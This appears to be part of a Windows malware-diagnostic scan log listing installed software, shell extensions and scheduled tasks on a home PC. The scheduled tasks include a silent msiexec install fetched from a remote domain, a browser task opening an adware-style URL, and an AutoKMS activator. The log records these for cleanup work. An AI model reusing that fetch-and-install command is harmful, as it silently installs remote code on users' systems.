CrystalDiskInfo 7.7.0 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.7.0 - Crystal Dew World)
Deep Sky Derelicts MULTi7 - ElAmigos versión 1.0.3 (HKLM-x32\...\{A878A899-B506-47F0-A74E-2C591FE06A6D}_is1) (Version: 1.0.3 - 1C Company)
Defraggler (HKLM\...\Defraggler) (Version: 2.21 - Piriform)
Desinstalación de CopyTrans Suite solamente (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\CopyTrans Suite) (Version: 4.013 - WindSolutions)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.35 - NVIDIA Corporation) Hidden
DUNGEON OF REGALIAS (HKLM-x32\...\{DBB5DBBF-5D9C-45C5-B235-86F386677CE3}) (Version: 1.00.0000 - 株式会社アルカディアワークス)
Eines de correcció del Microsoft Office 2013: català (HKLM\...\{90150000-001F-0403-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Ferramentas de verificación de Microsoft Office 2013 - Galego (HKLM\...\{90150000-001F-0456-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FL Studio ASIO (HKLM-x32\...\FL Studio ASIO) (Version:  - Image-Line)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Freemake Video Converter versión 4.1.9 (HKLM-x32\...\Freemake Video Converter_is1) (Version: 4.1.9 - Ellora Assets Corporation)
FTL version 1.5.13 (HKLM-x32\...\{20E23A40-38E5-4DD6-B738-BC8097AE66B6}_is1) (Version: 1.5.13 - Subset Games)
HWiNFO64 Version 5.84 (HKLM\...\HWiNFO64_is1) (Version: 5.84 - Martin Malík - REALiX)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.1.209 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
iTunes (HKLM\...\{9D0D2A8B-7E7B-4D88-8D50-24286ED6A5EB}) (Version: 12.5.5.5 - Apple Inc.)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
K-Lite Mega Codec Pack 13.0.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 13.0.0 - KLCP)
La Cosa (HKLM-x32\...\{632B286A-CD76-47A4-8C34-1AF49B08CEA3}) (Version:  - )
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LOST PLANET 2 (HKLM-x32\...\{43430808-081A-4C0D-B7CC-601000018301}) (Version: 1.0.0001.131 - CAPCOM CO., LTD.) Hidden
LOST PLANET 2 (HKLM-x32\...\{43430808-081A-4C0D-B7CC-601000018302}) (Version: 1.0.0001.131 - CAPCOM CO., LTD.) Hidden
Malwarebytes versión 3.6.1.2711 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.6.1.2711 - Malwarebytes)
MegaDownloader 1.7 (HKLM\...\{C12C2297-65A4-4E64-9AE1-29F0D947FDA0}}_is1) (Version: 1.7 - AppsForMega.info)
Microsoft .NET Framework 4.7.1 (español) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 3082) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft AppLocale (HKLM-x32\...\{394BE3D9-7F57-4638-A8D1-1D88671913B7}) (Version: 1.0.0 - MS)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90120000-00A4-0409-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{C79A7EAB-9D6F-4072-8A6D-F8F54957CD93}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{5DDC2234-4B37-45BC-AD33-41F1469B4D83}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU (HKLM\...\Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Applications - ENU (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Applications - ENU) (Version:  - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Windows Application Compatibility Database (HKLM\...\{deb7008b-681e-4a4a-8aae-cc833e8216ce}.sdb) (Version:  - )
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Minecraft versión 1.9.0 (HKLM-x32\...\{64E20254-DB52-4EC0-97E4-93B7C7B2DEDA}_is1) (Version: 1.9.0 - Mojang)
Mozilla Firefox 62.0.3 (x64 es-ES) (HKLM\...\Mozilla Firefox 62.0.3 (x64 es-ES)) (Version: 62.0.3 - Mozilla)
MSI Afterburner 4.3.0 (HKLM-x32\...\Afterburner) (Version: 4.3.0 - MSI Co., LTD)
Nitro Pro 10 (HKLM\...\{1D2A0303-DFD2-4C15-B6AB-44DED532EC0E}) (Version: 10.5.8.44 - Nitro)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NVIDIA Controlador de 3D Vision 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.35 - NVIDIA Corporation)
NVIDIA Controlador de audio HD 1.3.36.6 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.36.6 - NVIDIA Corporation)
NVIDIA Controlador de gráficos 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.35 - NVIDIA Corporation)
NVIDIA Controlador de la controladora 3D Vision 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Software del sistema PhysX 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Oure (HKLM-x32\...\Oure_is1) (Version:  - )
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Panel de control de NVIDIA 391.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 391.35 - NVIDIA Corporation) Hidden
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
Prince of Persia The Two Thrones MULTi6 - ElAmigos versión 1.0 (HKLM-x32\...\{FCED5627-4507-4D53-A6D4-093E8B5D1A1B}_is1) (Version: 1.0 - Ubisoft)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.49.927.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (HKLM\...\{90150000-001F-0416-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
RPG MAKER VX Ace RTP (HKLM-x32\...\RPGVXAce_RTP_is1) (Version: 1.00 - Enterbrain)
Skullgirls 2nd Encore (HKLM-x32\...\Skullgirls 2nd Encore_is1) (Version:  - )
SolidWorks 2014 x64 Edition SP03 (HKLM\...\{4FFA60C4-9A8B-4C9E-8265-2241B266304C}) (Version: 22.130.56 - SolidWorks) Hidden
SolidWorks 2014 x64 Edition SP03 (HKLM-x32\...\SolidWorks Installation Manager 20140-40300-1100-100) (Version: 22.3.0.56 - SolidWorks Corporation)
SolidWorks 2014 x64 Spanish Resources (HKLM\...\{E548E17E-189D-4E04-B5F1-17749F86EA0C}) (Version: 22.130.56 - SolidWorks) Hidden
SolidWorks Composer 2014 SP03 x64 Edition (HKLM\...\{EB45AA0F-96A7-4583-9E6F-6CA4DCFE67CE}) (Version: 22.30.56 - Dassault Systemes SolidWorks) Hidden
SolidWorks eDrawings 2014 x64 Edition SP03 (HKLM\...\{63BFDA11-6475-45E3-93E9-7D2AA28AECD5}) (Version: 14.3.107 - Dassault Systèmes SolidWorks Corp) Hidden
SolidWorks Electrical 2014 SP03 x64 Edition (HKLM\...\{3F08399F-67CD-4950-AED0-64A9590FE626}) (Version: 22.30.56 - DS SolidWorks) Hidden
SolidWorks Explorer 2014 SP03 x64 Edition (HKLM\...\{0C10FAF1-35D5-416A-B7C1-4168ED9485FA}) (Version: 22.30.56 - SolidWorks Corporation) Hidden
SolidWorks Flow Simulation 2014 SP03 x64 Edition  (HKLM\...\{4DC5DE7E-E67D-4A2B-8E67-EB7B28045247}) (Version: 22.30.57 - SolidWorks Corporation) Hidden
SolidWorks Plastics 2014 SP03 x64 Edition (HKLM\...\{104E8BAF-2E2A-4467-A5C0-92ED92F26547}) (Version: 22.30.56 - SolidWorks Corporation) Hidden
SQL Server 2012 Common Files (HKLM\...\{1D411379-9CE0-4B13-A19B-72D3222DD620}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Common Files (HKLM\...\{202AAF1F-69AA-442A-B59F-6B54B1AD07C6}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{18B2A97C-92C3-4AC7-BE72-F823E0BC895B}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (HKLM\...\{84FBCA4A-D650-4B0D-8094-EC0671FA9B91}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{54FF8FAB-DE27-4187-82F1-EBAE6AEE869A}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (HKLM\...\{6603C2CE-3C54-4F1D-92F9-8390CD4CCCA8}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (HKLM\...\{BED1EA3D-592D-4305-9D1F-20F03726EFC1}) (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
TuneUp Utilities 2014 (es-MX) (HKLM-x32\...\{460EA1C5-B71F-4DEA-99C1-A82016ADECD2}) (Version: 14.0.1000.353 - TuneUp Software) Hidden
TuneUp Utilities 2014 (HKLM-x32\...\{FE8D473A-6F06-4F99-B5F4-BED72B2A038C}) (Version: 14.0.1000.353 - TuneUp Software) Hidden
TuneUp Utilities 2014 (HKLM-x32\...\TuneUp Utilities) (Version: 14.0.1000.353 - TuneUp Software)
Uninstall Tool (HKLM\...\Uninstall Tool_is1) (Version: 3.4 - CrystalIDEA Software, Inc.)
Virtual Audio Cable 4.10 (HKLM\...\Virtual Audio Cable 4.10) (Version:  - )
VirtualDJ 8 (HKLM-x32\...\{A8EB77B7-2A7B-46F8-BF9D-9EE1F95A9A2E}) (Version: 8.0.2523.0 - Atomix Productions)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.2 - VideoLAN)
Voobly (HKLM-x32\...\Voobly_is1) (Version: Voobly - Voobly)
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
WinDirStat 1.1.2 (HKU\S-1-5-21-4162917515-3570797744-2880415204-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
WinZip 20.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C24105}) (Version: 20.5.12118 - WinZip Computing, S.L. )
Wizard of Legend MULTi5 - ElAmigos versión 1.01 (HKLM-x32\...\{0149F67B-F3C1-4C81-8CFF-E8F7C42F6D8E}_is1) (Version: 1.01 - Contingent99)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-4162917515-3570797744-2880415204-1000_Classes\CLSID\{CB2B673F-D441-4CD4-AFBE-DC4037CA4220}\InprocServer32 -> C:\Program Files\WinZip\adxloader64.dll ()
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} =>  -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} =>  -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2017-08-28] ()
ContextMenuHandlers1: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2016-03-08] (Piriform Ltd)
ContextMenuHandlers1: [NP8ShellExtension] -> {9C4B85B8-956C-49BF-9BA5-101384E562B2} => C:\Program Files\Nitro\Pro 10\NPShellExtension.dll [2016-03-03] (Nitro PDF)
ContextMenuHandlers1: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\TuneUp Utilities 2014\SDShelEx-x64.dll [2015-06-25] (TuneUp Software)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files\WinZip\wzshls64.dll [2016-04-29] (WinZip Computing, S.L.)
ContextMenuHandlers1-x32: [WondershareVideoConverterFileOpreation] -> {FEB746CA-95C2-485F-B386-C30D4E56D22E} => C:\Windows\SysWOW64\WSCM64.dll [2014-10-24] ()
ContextMenuHandlers2-x32: [AlcoholShellEx] -> {32020A01-506E-484D-A2A8-BE3CF17601C3} => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxShlex.dll [2010-03-25] (Alcohol Soft Development Team)
ContextMenuHandlers2-x32: [AlcoholShellEx64] -> {AF67B665-D752-424E-9A03-C7C218F2844F} => C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxShlEx64.dll [2010-03-25] (Alcohol Soft Development Team)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers4: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-03-27] (Piriform Ltd)
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => C:\Program Files (x86)\TuneUp Utilities 2014\DseShExt-x64.dll [2015-06-25] (TuneUp Software)
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\TuneUp Utilities 2014\SDShelEx-x64.dll [2015-06-25] (TuneUp Software)
ContextMenuHandlers4: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files\WinZip\wzshls64.dll [2016-04-29] (WinZip Computing, S.L.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-03-23] (NVIDIA Corporation)
ContextMenuHandlers6: [DefragglerShellExtension] -> {4380C993-0C43-4E02-9A7A-0D40B6EA7590} => C:\Program Files\Defraggler\DefragglerShell64.dll [2016-03-08] (Piriform Ltd)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-09-19] (Malwarebytes)
ContextMenuHandlers6: [RecuvaShellExt] -> {435E5DF5-2510-463C-B223-BDA47006D002} => C:\Program Files\Recuva\RecuvaShell64.dll [2015-03-27] (Piriform Ltd)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2015-11-18] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinZip] -> {E0D79304-84BE-11CE-9641-444553540000} => C:\Program Files\WinZip\wzshls64.dll [2016-04-29] (WinZip Computing, S.L.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0CF50F8A-B58B-4C0C-9794-32311F91E0C4} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2018-09-19] (Piriform Ltd)
Task: {1E580F1A-58B2-49B5-B06D-322A4633A861} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig
Task: {1E580F1A-58B2-49B5-B06D-322A4633A861} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfig => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)
Task: {37E63409-96F0-4A3B-A957-6783FE6AC65D} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [2018-09-19] (Piriform Ltd)
Task: {42EE44E8-7AD8-4AE9-9125-A26F6BB31C23} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2016-02-22] ()
Task: {4E8FC39F-C188-452B-A1C4-AD050363C37E} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation)
Task: {5074E7C9-8B67-498E-B5FA-3D6C2BCC441E} - System32\Tasks\{2089176A-4CFE-68B1-636B-92B40CB1F8E6} => "msiexec.exe" -i hxxp://inthemel.info/zbbqikhhxcuh.ciy -q
Task: {54C284F1-9B86-429C-9B70-433F38B5D831} - \SUPERAntiSpyware Scheduled Task dbbefc56-5364-4bfa-9168-4c0476674cbc -> No File <==== ATTENTION
Task: {58615BBD-D522-498D-B146-F04419B5A1D6} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\TuneUp Utilities 2014\OneClick.exe [2015-06-25] (TuneUp Software)
Task: {5AE0A303-B6A5-4780-9AEC-6EDB68B7E92B} - System32\Tasks\WinZipBackGroundToolsTask => C:\Program Files\WinZip\WzBGTools.exe [2016-04-29] (WinZip Computing, S.L.)
Task: {633C93F3-00CF-49CD-8B97-77B0B66E887F} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfigAndContent
Task: {633C93F3-00CF-49CD-8B97-77B0B66E887F} - System32\Tasks\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => Command(2): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)
Task: {6D5D7057-8FEF-4207-A656-9C37FCB41600} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe [2018-09-14] (AVAST Software)
Task: {8026CFAA-26D6-42E9-90BC-E1137B09FC08} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-07-21] (Oracle Corporation)
Task: {95570C4B-C3EE-42B3-8B08-B5D3402F3123} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [2018-09-24] (AVG Technologies CZ, s.r.o.)
Task: {A1DE8A18-7CB1-465F-AC85-51B0AE21C246} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_31_0_0_122_Plugin.exe [2018-10-09] (Adobe Systems Incorporated)
Task: {A87F6214-B479-4A28-BD0C-028D27A1F05C} - System32\Tasks\{AD1685E2-7536-7AF3-A95D-3F7867585C73} => "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" hxxp://jooring.net/cl/?guid=y59kcxeaks8jrwj72y9g2sxsddnfs11g&prid=1&pid=4_1324_0
Task: {A8C70671-9C51-48EA-B8AA-9AF19B279CE3} - System32\Tasks\update-S-1-5-21-4162917515-3570797744-2880415204-1000 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {A9392CAF-D155-4440-8DC2-D6BBF2D1A6E5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(1): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshConfig
Task: {A9392CAF-D155-4440-8DC2-D6BBF2D1A6E5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(2): %windir%\system32\GWX\GWXConfigManager.exe -> /RefreshContent
Task: {A9392CAF-D155-4440-8DC2-D6BBF2D1A6E5} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => Command(3): C:\Windows\system32\GWX\GWXDetector.exe [2015-12-08] (Microsoft Corporation)
